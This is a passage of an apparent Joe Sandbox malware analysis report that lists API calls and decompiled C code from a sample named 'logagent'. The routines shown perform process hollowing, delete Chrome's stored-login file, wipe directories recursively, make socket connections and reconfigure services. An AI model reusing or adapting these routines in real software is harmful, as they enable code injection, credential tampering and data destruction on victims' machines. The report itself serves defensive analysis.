                                  0x0040f33a
                                  0x0040f33c
                                  0x0040f33f
                                  0x0040f34a
                                  0x0040f353
                                  0x0040f35a
                                  0x0040f371
                                  0x0040f373
                                  0x0040f376
                                  0x0040f376
                                  0x0040f396
                                  0x00000000
                                  0x0040f398
                                  0x0040f39e
                                  0x0040f3a1
                                  0x0040f3b3
                                  0x00000000
                                  0x0040f3c3
                                  0x0040f3c3
                                  0x0040f3c3
                                  0x0040f3b3
                                  0x0040f396
                                  0x0040f319
                                  0x0040f2c9
                                  0x0040f29c
                                  0x0040f269
                                  0x0040f3d0
                                  0x0040f3db

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 0040F21E
                                  • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,7620F560), ref: 0040F23A
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040F241
                                  • CreateProcessW.KERNEL32 ref: 0040F294
                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,7620F560), ref: 0040F2AC
                                  • GetThreadContext.KERNEL32(?,00000000,?,00000000,7620F560), ref: 0040F2C1
                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,7620F560), ref: 0040F2E3
                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,7620F560), ref: 0040F30E
                                  • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,7620F560), ref: 0040F330
                                  • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,00000000,7620F560), ref: 0040F371
                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,7620F560), ref: 0040F392
                                  • SetThreadContext.KERNEL32(?,?,?,00000000,7620F560), ref: 0040F3AB
                                  • ResumeThread.KERNEL32(?,?,00000000,7620F560), ref: 0040F3B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                  • API String ID: 65594003-1050664331
                                  • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction ID: 14082434b540fb9a952e0d1072ae94245c422bc39d8110babfce67740ad62d51
                                  • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction Fuzzy Hash: 0E513A71A00204EFDB219F64CC85FAABBB9FF84710F20407AE914EB2A1D775E815CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040710F Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 32%
                                  			E0040710F() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				_t13 =  &_v24;
				L00414170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E00407A90("\n[Chrome StoredLogins found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E00407A90("\n[Chrome StoredLogins not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                  0x00407124
                                  0x0040712f
                                  0x00407136
                                  0x0040713a
                                  0x00407145
                                  0x0040714e
                                  0x0040715d
                                  0x004071b1
                                  0x004071b7
                                  0x004071bf
                                  0x004071c1
                                  0x004071c4
                                  0x00000000
                                  0x004071ca
                                  0x00407166
                                  0x00407167
                                  0x0040719c
                                  0x00407178
                                  0x0040717e
                                  0x00407184
                                  0x0040718f
                                  0x00000000
                                  0x00407195
                                  0x0040716a
                                  0x00407173
                                  0x00000000
                                  0x00407176
                                  0x0040716c
                                  0x00000000

                                  APIs
                                  • getenv.MSVCRT ref: 00407124
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040712F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040713A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407145
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040714E
                                  • DeleteFileA.KERNEL32(00000000), ref: 00407155
                                  • GetLastError.KERNEL32 ref: 0040715F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],00000000), ref: 0040717E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040718F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],00000000), ref: 004071B1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071C4
                                  Strings
                                  • [Chrome StoredLogins not found], xrefs: 00407179
                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407119
                                  • UserProfile, xrefs: 0040711F
                                  • [Chrome StoredLogins found, cleared!], xrefs: 004071AC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  • API String ID: 3740952235-1062637481
                                  • Opcode ID: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                  • Instruction ID: 31ca8e98cb087ed4ee3b22d3c36486bbccf77f9584d8598ce9e7038f5dc1f740
                                  • Opcode Fuzzy Hash: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                  • Instruction Fuzzy Hash: 51118475904509EBCB00BBE0ED4E9FE7738DA547417504036E812E32E1EA796A45CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412BEE Relevance: 24.1, APIs: 16, Instructions: 111fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412BEE(wchar_t* _a4) {
				signed char _v5;
				void* _v12;
				short _v532;
				long _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				void* _t46;

				wcscpy( &_v1052, _a4);
				wcscat( &_v1052, L"\\*");
				wcscpy( &_v532, _a4);
				wcscat( &_v532, "\\");
				_t46 = FindFirstFileW( &_v1052,  &_v1644);
				_v12 = _t46;
				if(_t46 == 0xffffffff) {
					L18:
					return 0;
				}
				wcscpy( &_v1052,  &_v532);
				_v5 = 1;
				do {
					if(FindNextFileW(_v12,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L17:
							FindClose(_v12);
							goto L18;
						}
						_v5 = _v5 & 0x00000000;
						goto L14;
					}
					if(E00412BBA( &(_v1644.cFileName)) != 0) {
						goto L14;
					}
					wcscat( &_v532,  &(_v1644.cFileName));
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L17;
						} else {
							L7:
							wcscpy( &_v532,  &_v1052);
							goto L14;
						}
					}
					if(E00412BEE( &_v532) == 0) {
						goto L17;
					}
					RemoveDirectoryW( &_v532);
					goto L7;
					L14:
				} while (_v5 != 0);
				FindClose(_v12);
				return RemoveDirectoryW(_a4);
			}









                                  0x00412c0a
                                  0x00412c1e
                                  0x00412c2a
                                  0x00412c38
                                  0x00412c4b
                                  0x00412c54
                                  0x00412c57
                                  0x00412d52
                                  0x00000000
                                  0x00412d52
                                  0x00412c6b
                                  0x00412c75
                                  0x00412c79
                                  0x00412c8b
                                  0x00412d26
                                  0x00412d49
                                  0x00412d4c
                                  0x00000000
                                  0x00412d4c
                                  0x00412d28
                                  0x00000000
                                  0x00412d28
                                  0x00412ca0
                                  0x00000000
                                  0x00000000
                                  0x00412cb4
                                  0x00412cbf
                                  0x00412cf6
                                  0x00412d04
                                  0x00412d04
                                  0x00412d19
                                  0x00000000
                                  0x00412d1b
                                  0x00412cdb
                                  0x00412ce9
                                  0x00000000
                                  0x00412cec
                                  0x00412d19
                                  0x00412cd0
                                  0x00000000
                                  0x00000000
                                  0x00412cd9
                                  0x00000000
                                  0x00412d2c
                                  0x00412d2c
                                  0x00412d39
                                  0x00000000

                                  APIs
                                  • wcscpy.MSVCRT ref: 00412C0A
                                  • wcscat.MSVCRT ref: 00412C1E
                                  • wcscpy.MSVCRT ref: 00412C2A
                                  • wcscat.MSVCRT ref: 00412C38
                                  • FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                  • wcscpy.MSVCRT ref: 00412C6B
                                  • FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                  • wcscat.MSVCRT ref: 00412CB4
                                  • wcscpy.MSVCRT ref: 00412CE9
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00412D04
                                  • DeleteFileW.KERNEL32(?), ref: 00412D11
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                  • GetLastError.KERNEL32 ref: 00412D1D
                                  • FindClose.KERNEL32(004085F5), ref: 00412D39
                                  • RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                  • FindClose.KERNEL32(004085F5), ref: 00412D4C
                                    • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BCC
                                    • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BDC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFindwcscpy$wcscat$CloseDirectoryRemovewcscmp$AttributesDeleteErrorFirstLastNext
                                  • String ID:
                                  • API String ID: 520940213-0
                                  • Opcode ID: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                  • Instruction ID: fb5d4b3d5d58ecc2c3d6dfc175ce5965a41efe56bc0731aa74bc7a01e785bf8c
                                  • Opcode Fuzzy Hash: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                  • Instruction Fuzzy Hash: BE415E72C0421CAADF21DBA0DD88FDE7BBDAF44304F1445A6E504E2050EBB59AD5CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054610D Relevance: 22.8, APIs: 15, Instructions: 324filenetworkthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _EH_prolog.MSVCRT ref: 10546112
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 10546142
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 10546151
                                  • _CxxThrowException.MSVCRT(00000001,00416FB8), ref: 105461CA
                                    • Part of subcall function 10546599: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 10546606
                                    • Part of subcall function 10546599: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 1054662C
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 10546223
                                  • _CxxThrowException.MSVCRT(00000002,00416FB8), ref: 10546277
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 10546286
                                  • _CxxThrowException.MSVCRT(00000003,00416FB8), ref: 10546374
                                  • _CxxThrowException.MSVCRT(00000004,00416FB8), ref: 105464AB
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 105464C8
                                  • atoi.MSVCRT ref: 10546517
                                    • Part of subcall function 10546836: _EH_prolog.MSVCRT ref: 1054683B
                                    • Part of subcall function 10546836: closesocket.WS2_32(?), ref: 1054687D
                                    • Part of subcall function 10546836: TerminateThread.KERNEL32(?,00000000,?,00000000,?,?,?,?,10546580,00000000), ref: 1054688F
                                  • _CxxThrowException.MSVCRT(00000000,00000000), ref: 10546565
                                  • atoi.MSVCRT ref: 10546574
                                  • FindClose.KERNEL32(?), ref: 10546585
                                  • RtlExitUserThread.NTDLL(00000000), ref: 1054658D
                                    • Part of subcall function 10543DCF: send.WS2_32(?,00000000), ref: 10543E4A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$ExceptionThrow$File$CloseFirstH_prologNextThreadatoi$ExitTerminateUserclosesocketconnectsendsocket
                                  • String ID:
                                  • API String ID: 1127153023-0
                                  • Opcode ID: f34def9d141907588ea012b1c6e0d4593feafa86c72f5945ab42735965801bbf
                                  • Instruction ID: 74c968ac219699bbca7d43f094faffe43e401ff7f65ab68f003b7b506960aadc
                                  • Opcode Fuzzy Hash: f34def9d141907588ea012b1c6e0d4593feafa86c72f5945ab42735965801bbf
                                  • Instruction Fuzzy Hash: F5C15072900619DBDB11EBA0DC9DADE7B7CEB84245F1041A6F506E30A0EB716B88CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105555CE Relevance: 18.1, APIs: 12, Instructions: 71windownativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E105555CE(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x41c1f0 = _t17;
					AppendMenuA(_t17, 0, 0, 0x416e0c);
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					 *0x415428(2, 0x41c200);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x41c1fc) == 0) {
							ShowWindow( *0x41c1fc, 9);
							SetForegroundWindow( *0x41c1fc);
						} else {
							ShowWindow( *0x41c1fc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x41c1f0, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L4:
					return  *0x4154e0(_a4);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L4;
			}








                                  0x105555d6
                                  0x105555d7
                                  0x105556ab
                                  0x105556bb
                                  0x105556c0
                                  0x105556c6
                                  0x00000000
                                  0x105556c6
                                  0x105555dd
                                  0x105555e2
                                  0x10555692
                                  0x00000000
                                  0x00000000
                                  0x1055569b
                                  0x105556a3
                                  0x105556a3
                                  0x105555ed
                                  0x10555609
                                  0x1055560e
                                  0x10555660
                                  0x1055567a
                                  0x10555686
                                  0x10555662
                                  0x1055566a
                                  0x1055566a
                                  0x00000000
                                  0x10555660
                                  0x10555613
                                  0x10555626
                                  0x1055562f
                                  0x1055564a
                                  0x00000000
                                  0x1055564a
                                  0x10555615
                                  0x10555618
                                  0x1055561b
                                  0x105555f8
                                  0x00000000
                                  0x105555fb
                                  0x105555ef
                                  0x105555f2
                                  0x105555f5
                                  0x00000000

                                  APIs
                                  • NtdllDefWindowProc_A.NTDLL(?,00000401,?,?), ref: 105555FB
                                  • GetCursorPos.USER32(?), ref: 10555626
                                  • SetForegroundWindow.USER32(?), ref: 1055562F
                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 1055564A
                                  • Shell_NotifyIcon.SHELL32(00000002,0041C200), ref: 1055569B
                                  • ExitProcess.KERNEL32 ref: 105556A3
                                  • CreatePopupMenu.USER32 ref: 105556AB
                                  • AppendMenuA.USER32(00000000,00000000,00000000,00416E0C), ref: 105556C0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
                                  • String ID:
                                  • API String ID: 1665278180-0
                                  • Opcode ID: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction ID: 3dfe655d3348a41d087801d026eedf30f6bfd104846c7bc97f2f15676f37ca44
                                  • Opcode Fuzzy Hash: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction Fuzzy Hash: 8521F531580649FBEB119FA4ED19BCA3F25EB0874AF608421F205E40B1C7B199A8AB5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411927 Relevance: 12.1, APIs: 8, Instructions: 64serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 48%
                                  			E00411927(void* _a4, signed char _a20) {
				short* _t6;
				signed int _t9;
				void* _t14;
				short* _t17;
				int _t19;
				void* _t21;
				void* _t22;

				_t17 = 0;
				_t6 = OpenSCManagerW(0, 0, 2);
				_t22 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t21 = OpenServiceW(_t22, _t6, 2);
				if(_t21 != 0) {
					_t19 =  &_a4 | 0xffffffff;
					_t9 = _a20 & 0x000000ff;
					if(_t9 == 0) {
						_push(4);
						goto L8;
					} else {
						_t14 = _t9 - 1;
						if(_t14 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t14 == 1) {
								_push(3);
								L8:
								_pop(_t19);
							}
						}
					}
					_t17 = _t17 & 0xffffff00 | ChangeServiceConfigW(_t21, 0xffffffff, _t19, 0xffffffff, _t17, _t17, _t17, _t17, _t17, _t17, _t17) != 0x00000000;
					CloseServiceHandle(_t22);
					CloseServiceHandle(_t21);
				} else {
					CloseServiceHandle(_t22);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t17;
			}










                                  0x0041192d
                                  0x00411933
                                  0x0041193e
                                  0x00411940
                                  0x0041194e
                                  0x00411952
                                  0x00411961
                                  0x00411964
                                  0x00411966
                                  0x00411976
                                  0x00000000
                                  0x00411968
                                  0x00411968
                                  0x00411969
                                  0x00411972
                                  0x00000000
                                  0x0041196b
                                  0x0041196c
                                  0x0041196e
                                  0x00411978
                                  0x00411978
                                  0x00411978
                                  0x0041196c
                                  0x00411969
                                  0x00411995
                                  0x00411998
                                  0x0041199b
                                  0x00411954
                                  0x00411955
                                  0x00411955
                                  0x004119a0
                                  0x004119ac

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00410FD9), ref: 00411986
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411998
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 0041199B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                  • String ID:
                                  • API String ID: 760094045-0
                                  • Opcode ID: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction ID: c2fa0ded83cb97236bb08be5de2499f982cdcb79c4471a71361dcbc3e7912862
                                  • Opcode Fuzzy Hash: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction Fuzzy Hash: 2201D2B1120528BAE6001B709C99EFB3F5CEF453B0B044226F632961E0CA644D81C9E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411700 Relevance: 12.0, APIs: 8, Instructions: 42serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00411700(void* _a4) {
				short* _t5;
				signed int _t12;
				void* _t15;
				void* _t16;

				_t12 = 0;
				_t5 = OpenSCManagerW(0, 0, 0x10);
				_t16 = _t5;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t15 = OpenServiceW(_t16, _t5, 0x10);
				if(_t15 != 0) {
					_t12 = 0 | StartServiceW(_t15, 0, 0) != 0x00000000;
					CloseServiceHandle(_t16);
					CloseServiceHandle(_t15);
				} else {
					CloseServiceHandle(_t16);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t12;
			}







                                  0x00411706
                                  0x0041170c
                                  0x00411717
                                  0x00411719
                                  0x00411727
                                  0x0041172b
                                  0x00411748
                                  0x0041174b
                                  0x0041174e
                                  0x0041172d
                                  0x0041172e
                                  0x0041172e
                                  0x00411753
                                  0x0041175f

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,0041B310,?,?,0041130D), ref: 0041170C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000010,?,?,0041130D), ref: 00411719
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,0041130D), ref: 00411721
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041172E
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041130D), ref: 00411739
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174B
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041130D), ref: 00411753
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ManagerStart
                                  • String ID:
                                  • API String ID: 3595611540-0
                                  • Opcode ID: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                  • Instruction ID: 0126697ef4a7dd551ba317b87bbb1749c3aaf445346a94cf1b379eb6c3c08625
                                  • Opcode Fuzzy Hash: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                  • Instruction Fuzzy Hash: 04F06D71110528FFD3106FB1EC88DFF3F6CEE893A47044025F90692160CB749E869AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10548EAA Relevance: 10.7, APIs: 7, Instructions: 190fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • getenv.MSVCRT ref: 10548EE7
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 10548F3C
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 10548F56
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,00415F68,?,?,?), ref: 10549055
                                  • GetLastError.KERNEL32(?,?,?,?,?,00415F68,?,?,?), ref: 1054905F
                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,00415F68,?,?,?), ref: 1054907B
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFile$DeleteErrorFirstLastgetenv
                                  • String ID:
                                  • API String ID: 1175699397-0
                                  • Opcode ID: 762876c4cb8c431da415acefb625b23a52fb379620e5f1e116059fae03045a50
                                  • Instruction ID: 582dd4586e61b690f4aadafe48ddf496447afc1134be1f8fe9c4cbc92b36900d
                                  • Opcode Fuzzy Hash: 762876c4cb8c431da415acefb625b23a52fb379620e5f1e116059fae03045a50
                                  • Instruction Fuzzy Hash: 73619E3190064EEBCB00ABA0DC9DAEEBFBDEF45355F104161E912D31A0EB715A8ECB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1055457D Relevance: 10.6, APIs: 7, Instructions: 111fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E1055457D(intOrPtr _a4) {
				signed char _v5;
				void* _v12;
				short _v532;
				short _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				void* _t46;
				intOrPtr* _t73;
				intOrPtr* _t82;
				intOrPtr* _t83;

				_t83 =  *0x4153b4;
				 *_t83( &_v1052, _a4);
				_t82 =  *0x4153a0;
				 *_t82( &_v1052, 0x416a54);
				 *_t83( &_v532, _a4);
				 *_t82( &_v532, 0x415a24);
				_t46 = FindFirstFileW( &_v1052,  &_v1644);
				_v12 = _t46;
				if(_t46 == 0xffffffff) {
					L18:
					return 0;
				}
				 *_t83( &_v1052,  &_v532);
				_t73 =  *0x415168;
				_v5 = 1;
				do {
					if(FindNextFileW(_v12,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L17:
							FindClose(_v12);
							goto L18;
						}
						_v5 = _v5 & 0x00000000;
						goto L14;
					}
					if(E10554549( &(_v1644.cFileName)) != 0) {
						goto L14;
					}
					 *_t82( &_v532,  &(_v1644.cFileName));
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
